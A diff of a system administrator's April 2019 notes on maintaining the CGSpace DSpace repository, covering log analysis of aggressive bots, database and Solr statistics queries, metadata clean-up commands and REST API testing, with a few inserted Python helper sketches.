    $ ./fix-metadata-values.py -i 2019-04-03-update-orcids.csv -db dspace -u dspace -p 'fuuu' -f cg.creator.id -m 240 -t correct -d
     
    • I created a pull request and merged the changes to the 5_x-prod branch (#417)
    • A few days ago I noticed some weird update process for the statistics-2018 Solr core and I see it’s still going:
    • @@ -210,7 +210,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
    • Interestingly, there are 5666 occurrences, and they are mostly for the 2018 core:
    -
    $ grep 'org.dspace.statistics.SolrLogger @ Updating' /home/cgspace.cgiar.org/log/dspace.log.2019-04-03 | awk '{print $11}' | sort | uniq -c
    +
    $ grep 'org.dspace.statistics.SolrLogger @ Updating' /home/cgspace.cgiar.org/log/dspace.log.2019-04-03 | awk '{print $11}' | sort | uniq -c
           1 
           3 http://localhost:8081/solr//statistics-2017
        5662 http://localhost:8081/solr//statistics-2018
    @@ -222,7 +222,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
     
  • Uptime Robot reported that CGSpace (linode18) went down tonight
  • I see there are lots of PostgreSQL connections:
  • -
    $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
    +
    $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
           5 dspaceApi
          10 dspaceCli
         250 dspaceWeb
    @@ -257,7 +257,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
     
     
  • Linode sent an alert that there was high CPU usage this morning on CGSpace (linode18) and these were the top IPs in the webserver access logs around the time:
  • -
    # zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "06/Apr/2019:(06|07|08|09)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "06/Apr/2019:(06|07|08|09)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         222 18.195.78.144
         245 207.46.13.58
         303 207.46.13.194
    @@ -268,7 +268,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
        1803 66.249.79.59
        2834 2a01:4f8:140:3192::2
        9623 45.5.184.72
    -# zcat --force /var/log/nginx/{rest,oai}.log /var/log/nginx/{rest,oai}.log.1 | grep -E "06/Apr/2019:(06|07|08|09)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +# zcat --force /var/log/nginx/{rest,oai}.log /var/log/nginx/{rest,oai}.log.1 | grep -E "06/Apr/2019:(06|07|08|09)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
          31 66.249.79.62
          41 207.46.13.210
          42 40.77.167.66
    @@ -287,14 +287,14 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
     
  • Their user agent is the one I added to the badbots list in nginx last week: “GuzzleHttp/6.3.3 curl/7.47.0 PHP/7.0.30-0ubuntu0.16.04.1”
  • They made 22,000 requests to Discover on this collection today alone (and it’s only 11AM):
  • -
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep "06/Apr/2019" | grep 45.5.184.72 | grep -oE '/handle/[0-9]+/[0-9]+/discover' | sort | uniq -c 
    +
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep "06/Apr/2019" | grep 45.5.184.72 | grep -oE '/handle/[0-9]+/[0-9]+/discover' | sort | uniq -c 
       22077 /handle/10568/72970/discover
     
    • Yesterday they made 43,000 requests and we actually blocked most of them:
    -
    # zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep "05/Apr/2019" | grep 45.5.184.72 | grep -oE '/handle/[0-9]+/[0-9]+/discover' | sort | uniq -c 
    +
    # zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep "05/Apr/2019" | grep 45.5.184.72 | grep -oE '/handle/[0-9]+/[0-9]+/discover' | sort | uniq -c 
       43631 /handle/10568/72970/discover
    -# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep "05/Apr/2019" | grep 45.5.184.72 | grep -E '/handle/[0-9]+/[0-9]+/discover' | awk '{print $9}' | sort | uniq -c 
    +# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep "05/Apr/2019" | grep 45.5.184.72 | grep -E '/handle/[0-9]+/[0-9]+/discover' | awk '{print $9}' | sort | uniq -c 
         142 200
       43489 503
     
      @@ -315,53 +315,53 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
    -
    $ http --print b 'http://localhost:8081/solr/statistics/select?q=type%3A0+AND+(ip%3A18.196.196.108+OR+ip%3A18.195.78.144+OR+ip%3A18.195.218.6)&fq=statistics_type%3Aview&fq=bundleName%3AORIGINAL&fq=dateYearMonth%3A2019-03&rows=0&wt=json&indent=true'
    +
    $ http --print b 'http://localhost:8081/solr/statistics/select?q=type%3A0+AND+(ip%3A18.196.196.108+OR+ip%3A18.195.78.144+OR+ip%3A18.195.218.6)&fq=statistics_type%3Aview&fq=bundleName%3AORIGINAL&fq=dateYearMonth%3A2019-03&rows=0&wt=json&indent=true'
     {
    -    "response": {
    -        "docs": [],
    -        "numFound": 96925,
    -        "start": 0
    +    "response": {
    +        "docs": [],
    +        "numFound": 96925,
    +        "start": 0
         },
    -    "responseHeader": {
    -        "QTime": 1,
    -        "params": {
    -            "fq": [
    -                "statistics_type:view",
    -                "bundleName:ORIGINAL",
    -                "dateYearMonth:2019-03"
    +    "responseHeader": {
    +        "QTime": 1,
    +        "params": {
    +            "fq": [
    +                "statistics_type:view",
    +                "bundleName:ORIGINAL",
    +                "dateYearMonth:2019-03"
                 ],
    -            "indent": "true",
    -            "q": "type:0 AND (ip:18.196.196.108 OR ip:18.195.78.144 OR ip:18.195.218.6)",
    -            "rows": "0",
    -            "wt": "json"
    +            "indent": "true",
    +            "q": "type:0 AND (ip:18.196.196.108 OR ip:18.195.78.144 OR ip:18.195.218.6)",
    +            "rows": "0",
    +            "wt": "json"
             },
    -        "status": 0
    +        "status": 0
         }
     }
     
    • Strangely I don’t see many hits in 2019-04:
    -
    $ http --print b 'http://localhost:8081/solr/statistics/select?q=type%3A0+AND+(ip%3A18.196.196.108+OR+ip%3A18.195.78.144+OR+ip%3A18.195.218.6)&fq=statistics_type%3Aview&fq=bundleName%3AORIGINAL&fq=dateYearMonth%3A2019-04&rows=0&wt=json&indent=true'
    +
    $ http --print b 'http://localhost:8081/solr/statistics/select?q=type%3A0+AND+(ip%3A18.196.196.108+OR+ip%3A18.195.78.144+OR+ip%3A18.195.218.6)&fq=statistics_type%3Aview&fq=bundleName%3AORIGINAL&fq=dateYearMonth%3A2019-04&rows=0&wt=json&indent=true'
     {
    -    "response": {
    -        "docs": [],
    -        "numFound": 38,
    -        "start": 0
    +    "response": {
    +        "docs": [],
    +        "numFound": 38,
    +        "start": 0
         },
    -    "responseHeader": {
    -        "QTime": 1,
    -        "params": {
    -            "fq": [
    -                "statistics_type:view",
    -                "bundleName:ORIGINAL",
    -                "dateYearMonth:2019-04"
    +    "responseHeader": {
    +        "QTime": 1,
    +        "params": {
    +            "fq": [
    +                "statistics_type:view",
    +                "bundleName:ORIGINAL",
    +                "dateYearMonth:2019-04"
                 ],
    -            "indent": "true",
    -            "q": "type:0 AND (ip:18.196.196.108 OR ip:18.195.78.144 OR ip:18.195.218.6)",
    -            "rows": "0",
    -            "wt": "json"
    +            "indent": "true",
    +            "q": "type:0 AND (ip:18.196.196.108 OR ip:18.195.78.144 OR ip:18.195.218.6)",
    +            "rows": "0",
    +            "wt": "json"
             },
    -        "status": 0
    +        "status": 0
         }
     }
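
Since the two Solr queries above differ only in the `dateYearMonth` filter, a small helper could build the URL for any month. This is a rough sketch with hypothetical function names. It assumes the same `statistics` core URL and filters as the queries above and makes no request itself. `urlencode` also percent-encodes the parentheses, which Solr should decode to the same query string.

```python
from urllib.parse import urlencode


def build_stats_query(base_url, ips, year_month):
    """Build a Solr select URL counting bitstream views from the given IPs in one month."""
    ip_clause = " OR ".join(f"ip:{ip}" for ip in ips)
    params = [
        ("q", f"type:0 AND ({ip_clause})"),
        ("fq", "statistics_type:view"),
        ("fq", "bundleName:ORIGINAL"),
        ("fq", f"dateYearMonth:{year_month}"),
        ("rows", "0"),  # only the hit count is needed, not the documents
        ("wt", "json"),
        ("indent", "true"),
    ]
    return base_url + "?" + urlencode(params)


def num_found(response):
    """Extract the hit count from a decoded Solr JSON response."""
    return response["response"]["numFound"]


if __name__ == "__main__":
    ips = ["18.196.196.108", "18.195.78.144", "18.195.218.6"]
    for month in ("2019-03", "2019-04"):
        print(build_stats_query("http://localhost:8081/solr/statistics/select", ips, month))
```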
     
      @@ -419,8 +419,8 @@ X-XSS-Protection: 1; mode=block
    • And from the server side, the nginx logs show:
    -
    78.x.x.x - - [07/Apr/2019:01:38:35 -0700] "GET /bitstream/handle/10568/100289/Spore-192-EN-web.pdf HTTP/1.1" 200 68078 "-" "HTTPie/1.0.2"
    -78.x.x.x - - [07/Apr/2019:01:39:01 -0700] "HEAD /bitstream/handle/10568/100289/Spore-192-EN-web.pdf HTTP/1.1" 200 0 "-" "HTTPie/1.0.2"
    +
    78.x.x.x - - [07/Apr/2019:01:38:35 -0700] "GET /bitstream/handle/10568/100289/Spore-192-EN-web.pdf HTTP/1.1" 200 68078 "-" "HTTPie/1.0.2"
    +78.x.x.x - - [07/Apr/2019:01:39:01 -0700] "HEAD /bitstream/handle/10568/100289/Spore-192-EN-web.pdf HTTP/1.1" 200 0 "-" "HTTPie/1.0.2"
     
    • So the transfer is definitely smaller with a HEAD request, but I need to wait to see whether these requests show up in Solr
        @@ -448,26 +448,26 @@ X-XSS-Protection: 1; mode=block
      • According to the DSpace 5.x Solr documentation the default commit time is after 15 minutes or 10,000 documents (see solrconfig.xml)
      • I looped some GET and HEAD requests to a bitstream on my local instance and after some time I see that they do register as downloads (even though they are internal):
      -
      $ http --print b 'http://localhost:8080/solr/statistics/select?q=type%3A0+AND+time%3A2019-04-07*&fq=statistics_type%3Aview&fq=isInternal%3Atrue&rows=0&wt=json&indent=true'
      +
      $ http --print b 'http://localhost:8080/solr/statistics/select?q=type%3A0+AND+time%3A2019-04-07*&fq=statistics_type%3Aview&fq=isInternal%3Atrue&rows=0&wt=json&indent=true'
       {
      -    "response": {
      -        "docs": [],
      -        "numFound": 909,
      -        "start": 0
      +    "response": {
      +        "docs": [],
      +        "numFound": 909,
      +        "start": 0
           },
      -    "responseHeader": {
      -        "QTime": 0,
      -        "params": {
      -            "fq": [
      -                "statistics_type:view",
      -                "isInternal:true"
      +    "responseHeader": {
      +        "QTime": 0,
      +        "params": {
      +            "fq": [
      +                "statistics_type:view",
      +                "isInternal:true"
                   ],
      -            "indent": "true",
      -            "q": "type:0 AND time:2019-04-07*",
      -            "rows": "0",
      -            "wt": "json"
      +            "indent": "true",
      +            "q": "type:0 AND time:2019-04-07*",
      +            "rows": "0",
      +            "wt": "json"
               },
      -        "status": 0
      +        "status": 0
           }
       }
       
        @@ -501,7 +501,7 @@ X-XSS-Protection: 1; mode=block
      • According to the server logs there is actually not much going on right now:
      -
      # zcat --force /var/log/nginx/{access,library-access}.log /var/log/nginx/{access,library-access}.log.1 | grep -E "07/Apr/2019:(18|19|20)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
      +
      # zcat --force /var/log/nginx/{access,library-access}.log /var/log/nginx/{access,library-access}.log.1 | grep -E "07/Apr/2019:(18|19|20)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
           118 18.195.78.144
           128 207.46.13.219
           129 167.114.64.100
      @@ -512,7 +512,7 @@ X-XSS-Protection: 1; mode=block
           363 40.77.167.21
           740 2a01:4f8:140:3192::2
          4823 45.5.184.72
      -# zcat --force /var/log/nginx/{rest,oai}.log /var/log/nginx/{rest,oai}.log.1 | grep -E "07/Apr/2019:(18|19|20)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
      +# zcat --force /var/log/nginx/{rest,oai}.log /var/log/nginx/{rest,oai}.log.1 | grep -E "07/Apr/2019:(18|19|20)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
             3 66.249.79.62
             3 66.249.83.196
             4 207.46.13.86
      @@ -529,7 +529,7 @@ X-XSS-Protection: 1; mode=block
       
    • 2408:8214:7a00:868f:7c1e:e0f3:20c6:c142 is some stupid Chinese bot making malicious POST requests
    • There are free database connections in the pool:
    -
    $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
    +
    $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
           5 dspaceApi
           7 dspaceCli
          23 dspaceWeb
    @@ -560,7 +560,7 @@ X-XSS-Protection: 1; mode=block
     
  • See the OpenRefine variables documentation for more notes about the recon object
  • I also noticed a handful of errors in our current list of affiliations so I corrected them:
  • -
    $ ./fix-metadata-values.py -i 2019-04-08-fix-13-affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211 -t correct -d
    +
    $ ./fix-metadata-values.py -i 2019-04-08-fix-13-affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211 -t correct -d
     
    • We should create a new list of affiliations to update our controlled vocabulary again
    • I dumped a list of the top 1500 affiliations:
    • @@ -570,20 +570,20 @@ COPY 1500
    • Fix a few more messed up affiliations that have return characters in them (use Ctrl-V Ctrl-M to re-create control character):
    -
    dspace=# UPDATE metadatavalue SET text_value='International Institute for Environment and Development' WHERE resource_type_id = 2 AND metadata_field_id = 211 AND text_value LIKE 'International Institute^M%';
    -dspace=# UPDATE metadatavalue SET text_value='Kenya Agriculture and Livestock Research Organization' WHERE resource_type_id = 2 AND metadata_field_id = 211 AND text_value LIKE 'Kenya Agricultural  and Livestock  Research^M%';
    +
    dspace=# UPDATE metadatavalue SET text_value='International Institute for Environment and Development' WHERE resource_type_id = 2 AND metadata_field_id = 211 AND text_value LIKE 'International Institute^M%';
    +dspace=# UPDATE metadatavalue SET text_value='Kenya Agriculture and Livestock Research Organization' WHERE resource_type_id = 2 AND metadata_field_id = 211 AND text_value LIKE 'Kenya Agricultural  and Livestock  Research^M%';
     
    • I noticed a bunch of subjects and affiliations that use stylized apostrophes so I will export those and then batch update them:
    -
    dspace=# \COPY (SELECT DISTINCT text_value FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 AND text_value LIKE '%’%') to /tmp/2019-04-08-affiliations-apostrophes.csv WITH CSV HEADER;
    +
    dspace=# \COPY (SELECT DISTINCT text_value FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 AND text_value LIKE '%’%') to /tmp/2019-04-08-affiliations-apostrophes.csv WITH CSV HEADER;
     COPY 60
    -dspace=# \COPY (SELECT DISTINCT text_value FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 57 AND text_value LIKE '%’%') to /tmp/2019-04-08-subject-apostrophes.csv WITH CSV HEADER;
    +dspace=# \COPY (SELECT DISTINCT text_value FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 57 AND text_value LIKE '%’%') to /tmp/2019-04-08-subject-apostrophes.csv WITH CSV HEADER;
     COPY 20
     
    • I cleaned them up in OpenRefine and then applied the fixes on CGSpace and DSpace Test:
    -
    $ ./fix-metadata-values.py -i /tmp/2019-04-08-fix-60-affiliations-apostrophes.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211 -t correct -d
    -$ ./fix-metadata-values.py -i /tmp/2019-04-08-fix-20-subject-apostrophes.csv -db dspace -u dspace -p 'fuuu' -f dc.subject -m 57 -t correct -d
    +
    $ ./fix-metadata-values.py -i /tmp/2019-04-08-fix-60-affiliations-apostrophes.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211 -t correct -d
    +$ ./fix-metadata-values.py -i /tmp/2019-04-08-fix-20-subject-apostrophes.csv -db dspace -u dspace -p 'fuuu' -f dc.subject -m 57 -t correct -d
     
    • UptimeRobot said that CGSpace (linode18) went down tonight
        @@ -592,7 +592,7 @@ $ ./fix-metadata-values.py -i /tmp/2019-04-08-fix-20-subject-apostrophes.csv -db
    -
    $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
    +
    $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
           5 dspaceApi
           7 dspaceCli
         250 dspaceWeb
    @@ -609,7 +609,7 @@ org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exe
     
  • Linode Support still didn’t respond to my ticket from yesterday, so I attached a new output of iostat 1 10 and asked them to move the VM to a less busy host
  • The web server logs are not very busy:
  • -
    # zcat --force /var/log/nginx/{access,library-access}.log /var/log/nginx/{access,library-access}.log.1 | grep -E "08/Apr/2019:(17|18|19)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/{access,library-access}.log /var/log/nginx/{access,library-access}.log.1 | grep -E "08/Apr/2019:(17|18|19)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         124 40.77.167.135
         135 95.108.181.88
         139 157.55.39.206
    @@ -620,7 +620,7 @@ org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exe
         457 157.55.39.164
         457 40.77.167.132
        3822 45.5.184.72
    -# zcat --force /var/log/nginx/{rest,oai}.log /var/log/nginx/{rest,oai}.log.1 | grep -E "08/Apr/2019:(17|18|19)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +# zcat --force /var/log/nginx/{rest,oai}.log /var/log/nginx/{rest,oai}.log.1 | grep -E "08/Apr/2019:(17|18|19)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
           5 129.0.79.206
           5 41.205.240.21
           7 207.46.13.95
    @@ -636,7 +636,7 @@ org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exe
     
  • Linode sent an alert that CGSpace (linode18) was at 440% CPU for the last two hours this morning
  • Here are the top IPs in the web server logs around that time:
  • -
    # zcat --force /var/log/nginx/{rest,oai}.log /var/log/nginx/{rest,oai}.log.1 | grep -E "09/Apr/2019:(06|07|08)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/{rest,oai}.log /var/log/nginx/{rest,oai}.log.1 | grep -E "09/Apr/2019:(06|07|08)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
          18 66.249.79.139
          21 157.55.39.160
          29 66.249.79.137
    @@ -647,7 +647,7 @@ org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exe
        1166 45.5.184.72
        4251 45.5.186.2
        4895 205.186.128.185
    -# zcat --force /var/log/nginx/{access,library-access}.log /var/log/nginx/{access,library-access}.log.1 | grep -E "09/Apr/2019:(06|07|08)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +# zcat --force /var/log/nginx/{access,library-access}.log /var/log/nginx/{access,library-access}.log.1 | grep -E "09/Apr/2019:(06|07|08)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         200 144.48.242.108
         202 207.46.13.185
         206 18.194.46.84
    @@ -665,7 +665,7 @@ org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exe
     
    • Database connection usage looks fine:
    -
    $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
    +
    $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
           5 dspaceApi
           7 dspaceCli
          11 dspaceWeb
    @@ -683,15 +683,15 @@ org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exe
     
  • Abenet pointed out a possibility of validating funders against the CrossRef API
  • Note that if you use HTTPS and specify a contact address in the API request you are less likely to be blocked
  • -
    $ http 'https://api.crossref.org/funders?query=mercator&mailto=me@cgiar.org'
    +
    $ http 'https://api.crossref.org/funders?query=mercator&mailto=me@cgiar.org'
     
    • Otherwise, they provide the funder data in CSV and RDF format
    • I did a quick test with the recent IITA records against reconcile-csv in OpenRefine and it matched a few, but the ones that didn’t match will need a human to go and do some manual checking and informed decision making…
    • If I want to write a script for this I could use the Python habanero library:
    from habanero import Crossref
    -cr = Crossref(mailto="me@cgiar.org")
    -x = cr.funders(query = "mercator")
    +cr = Crossref(mailto="me@cgiar.org")
    +x = cr.funders(query = "mercator")
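
A funder validation script built on the habanero call above might start from something like the following. It is only a sketch under stated assumptions: `match_funders` and the sample data are hypothetical, and it assumes each funder item in the CrossRef response carries a `name` and an optional `alt-names` list. It does exact, case-insensitive matching only, so anything it leaves unmatched would still need the manual checking mentioned above.

```python
def match_funders(names, items):
    """Map each name to a canonical funder name, or report it as unmatched.

    `items` is assumed to look like the list found under
    x["message"]["items"] in a CrossRef funders response.
    """
    known = {}
    for item in items:
        # Index the primary name and every alternative name, case-insensitively
        for label in [item["name"], *item.get("alt-names", [])]:
            known[label.casefold()] = item["name"]

    matched, unmatched = {}, []
    for name in names:
        canonical = known.get(name.strip().casefold())
        if canonical is None:
            unmatched.append(name)
        else:
            matched[name] = canonical
    return matched, unmatched


# Hypothetical sample data for illustration, not a real API response
SAMPLE_ITEMS = [
    {"name": "Stiftung Mercator", "alt-names": ["Mercator Foundation"]},
]

if __name__ == "__main__":
    matched, unmatched = match_funders(
        ["mercator foundation", "Mercator Trust"], SAMPLE_ITEMS
    )
    print("matched:", matched)
    print("needs manual review:", unmatched)
```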
     

    2019-04-11

    • Continue proofing IITA’s last round of batch uploads from March on DSpace Test (20193rd.xls)
    @@ -720,8 +720,8 @@ x = cr.funders(query = "mercator")
    • I captured a few general corrections and deletions for AGROVOC subjects while looking at IITA’s records, so I applied them to DSpace Test and CGSpace:
    -
    $ ./fix-metadata-values.py -i /tmp/2019-04-11-fix-14-subjects.csv -db dspace -u dspace -p 'fuuu' -f dc.subject -m 57 -t correct -d
    -$ ./delete-metadata-values.py -i /tmp/2019-04-11-delete-6-subjects.csv -db dspace -u dspace -p 'fuuu' -m 57 -f dc.subject -d
    +
    $ ./fix-metadata-values.py -i /tmp/2019-04-11-fix-14-subjects.csv -db dspace -u dspace -p 'fuuu' -f dc.subject -m 57 -t correct -d
    +$ ./delete-metadata-values.py -i /tmp/2019-04-11-delete-6-subjects.csv -db dspace -u dspace -p 'fuuu' -m 57 -f dc.subject -d
     
    • Answer more questions about DOIs and Altmetric scores from WLE
    • Answer more questions about DOIs and Altmetric scores from IWMI
    @@ -753,7 +753,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-04-11-delete-6-subjects.csv -db dspac
      • Change DSpace Test (linode19) to use the Java GC tuning from the Solr 4.10.4 startup script:
      -
      GC_TUNE="-XX:NewRatio=3 \
      +
      GC_TUNE="-XX:NewRatio=3 \
           -XX:SurvivorRatio=4 \
           -XX:TargetSurvivorRatio=90 \
           -XX:MaxTenuringThreshold=8 \
      @@ -766,7 +766,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-04-11-delete-6-subjects.csv -db dspac
           -XX:CMSInitiatingOccupancyFraction=50 \
           -XX:CMSMaxAbortablePrecleanTime=6000 \
           -XX:+CMSParallelRemarkEnabled \
      -    -XX:+ParallelRefProcEnabled"
      +    -XX:+ParallelRefProcEnabled"
       
      • I need to remember to check the Munin JVM graphs in a few days
      • It might be placebo, but the site does feel snappier…
      • @@ -791,14 +791,14 @@ import re
       import urllib
       import urllib2
      -handle = re.findall('[0-9]+/[0-9]+', value)
      +handle = re.findall('[0-9]+/[0-9]+', value)
      -url = 'https://cgspace.cgiar.org/rest/handle/' + handle[0]
      +url = 'https://cgspace.cgiar.org/rest/handle/' + handle[0]
       req = urllib2.Request(url)
      -req.add_header('User-agent', 'Alan Python bot')
      +req.add_header('User-agent', 'Alan Python bot')
       res = urllib2.urlopen(req)
       data = json.load(res)
      -item_id = data['id']
      +item_id = data['id']
       return item_id
        @@ -1053,7 +1053,7 @@ TCP window size: 85.0 KByte (default)
    • Apparently it happens once per request, which can be at least 1,500 times per day according to the DSpace logs on CGSpace (linode18):
    -
    $ grep -c 'Falling back to request address' dspace.log.2019-04-20
    +
    $ grep -c 'Falling back to request address' dspace.log.2019-04-20
     dspace.log.2019-04-20:1515
     
    • I will fix it in dspace/config/modules/oai.cfg
    • @@ -1098,7 +1098,7 @@ dspace.log.2019-04-20:1515
    -
    $ csvcut -c id,dc.identifier.uri,'dc.identifier.uri[]' ~/Downloads/2019-04-24-IITA.csv > /tmp/iita.csv
    +
    $ csvcut -c id,dc.identifier.uri,'dc.identifier.uri[]' ~/Downloads/2019-04-24-IITA.csv > /tmp/iita.csv
     
    • Carlos Tejo from the Land Portal had been emailing me this week to ask about the old REST API that Tsega was building in 2017
        @@ -1108,7 +1108,7 @@ dspace.log.2019-04-20:1515
    -
    $ curl -f -H "accept: application/json" -H "Content-Type: application/json" -X POST "https://dspacetest.cgiar.org/rest/items/find-by-metadata-field" -d '{"key":"cg.subject.cpwf", "value":"WATER MANAGEMENT","language": "en_US"}'
    +
    $ curl -f -H "accept: application/json" -H "Content-Type: application/json" -X POST "https://dspacetest.cgiar.org/rest/items/find-by-metadata-field" -d '{"key":"cg.subject.cpwf", "value":"WATER MANAGEMENT","language": "en_US"}'
     curl: (22) The requested URL returned error: 401
     
    • Note that curl only shows the HTTP 401 error if you use -f (fail), and only then if you don’t include -s
    @@ -1118,19 +1118,19 @@ curl: (22) The requested URL returned error: 401
    -
    dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value='WATER MANAGEMENT' AND text_lang='en_US';
    +
    dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value='WATER MANAGEMENT' AND text_lang='en_US';
      count 
     -------
        376
     (1 row)
     
    -dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value='WATER MANAGEMENT' AND text_lang='';
    +dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value='WATER MANAGEMENT' AND text_lang='';
      count 
     -------
        149
     (1 row)
     
    -dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value='WATER MANAGEMENT' AND text_lang IS NULL;
    +dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value='WATER MANAGEMENT' AND text_lang IS NULL;
      count 
     -------
        417
    @@ -1146,20 +1146,20 @@ dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AN
     
    • Nevertheless, if I request using the null language I get 1020 results, plus 179 for a blank language attribute:
    -
    $ curl -s -H "Content-Type: application/json" -X POST "https://dspacetest.cgiar.org/rest/items/find-by-metadata-field" -d '{"key":"cg.subject.cpwf", "value":"WATER MANAGEMENT","language": null}' | jq length
    +
    $ curl -s -H "Content-Type: application/json" -X POST "https://dspacetest.cgiar.org/rest/items/find-by-metadata-field" -d '{"key":"cg.subject.cpwf", "value":"WATER MANAGEMENT","language": null}' | jq length
     1020
    -$ curl -s -H "Content-Type: application/json" -X POST "https://dspacetest.cgiar.org/rest/items/find-by-metadata-field" -d '{"key":"cg.subject.cpwf", "value":"WATER MANAGEMENT","language": ""}' | jq length
    +$ curl -s -H "Content-Type: application/json" -X POST "https://dspacetest.cgiar.org/rest/items/find-by-metadata-field" -d '{"key":"cg.subject.cpwf", "value":"WATER MANAGEMENT","language": ""}' | jq length
     179
     
    • This is weird because I see 942–1156 items with “WATER MANAGEMENT” (depending on wildcard matching for errors in subject spelling):
    -
    dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value='WATER MANAGEMENT';
    +
    dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value='WATER MANAGEMENT';
      count 
     -------
        942
     (1 row)
     
    -dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value LIKE '%WATER MANAGEMENT%';
    +dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value LIKE '%WATER MANAGEMENT%';
      count 
     -------
       1156
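As a quick sanity check on the numbers above, the three per-language counts (en_US, blank, and NULL) can be added up and compared with the exact-match total. This is only arithmetic on the psql output already shown, and the variable names are made up for illustration:

```shell
# Per-language counts for 'WATER MANAGEMENT' taken from the psql output above
en_us=376      # text_lang='en_US'
blank=149      # text_lang=''
null_lang=417  # text_lang IS NULL

# Sum them to compare against the exact-match total reported by psql
total=$((en_us + blank + null_lang))
echo "$total"
```

The sum matches the 942 exact matches, so assuming no other text_lang values exist for this term, the database counts look internally consistent and the odd numbers are more likely coming from the REST API side.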
    @@ -1177,13 +1177,13 @@ dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AN
     
     
  • I tested the REST API after logging in with my super admin account and I was able to get results for the problematic query:
  • -
